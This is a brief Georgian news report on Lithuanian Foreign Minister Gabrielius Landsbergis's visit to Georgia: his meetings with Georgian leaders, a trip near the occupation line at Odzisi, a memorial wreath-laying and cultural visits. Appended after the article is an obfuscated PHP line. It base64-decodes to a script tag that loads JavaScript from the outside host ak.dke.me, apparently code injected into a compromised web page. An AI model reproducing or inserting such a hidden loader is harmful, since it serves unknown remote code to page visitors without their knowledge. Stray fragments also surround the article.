celsiusi
ავერსი შნაიდერი
საქართველოში ვიზიტით მყოფი ლიეტუვის რესპუბლიკის საგარეო საქმეთა მინისტრი გაბრიელიუს ლანდსბერგისი ოფიციალურ შეხვედრებს დღეიდან დაიწყებს.
 
ვიზიტის ფარგლებში ლიეტუვის საგარეო უწყების ხელმძღვანელი დღეს პირისპირ შეხვედრას საქართველოს პრემიერ-მინისტრთან, პრეზიდენტთან და პარლამენტის თავმჯდომარესთან გამართავს.
 
პირისპირ შეხვედრა გაიმართება ვიცე-პრემიერთან, საგარეო საქმეთა მინისტრ დავით ზალკალიანთანაც, რის შემდეგაც ორი ქვეყნის დელეგაციებს შორის გაფართოებული ფორმატის შეხვედრაც შედგება.
 
საქართველოში ყოფნისას, გაბრიელიუს ლანდსბერგისი საოკუპაციო ხაზის მიმდებარე სოფელ ოძისშიც გაემგზავრება, სადაც ევროკავშირის სადამკვირვებლო მისიასთან ერთად არსებულ ვითარება სადგილზე გაეცნობა. ის ასევე, პატივს მიაგებს ქვეყნის ერთიანობისათვის დაღუპულ მებრძოლებს და გმირთა მემორიალს გვირგვინით შეამკობს.
 
ვიზიტის ფარგლებში, ლიეტუვის დელეგაცია საქართველოს ეროვნულ მუზეუმს ეწვევა და ქალაქის კულტურულ ღირსშესანიშნაობებს გაეცნობა.
 
ცნობისთვის, ლიეტუვის რესპუბლიკის საგარეო საქმეთა მინისტრი გაბრიელიუს ლანდსბერგისი საქართველოს გუშინ ეწვია.
987
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");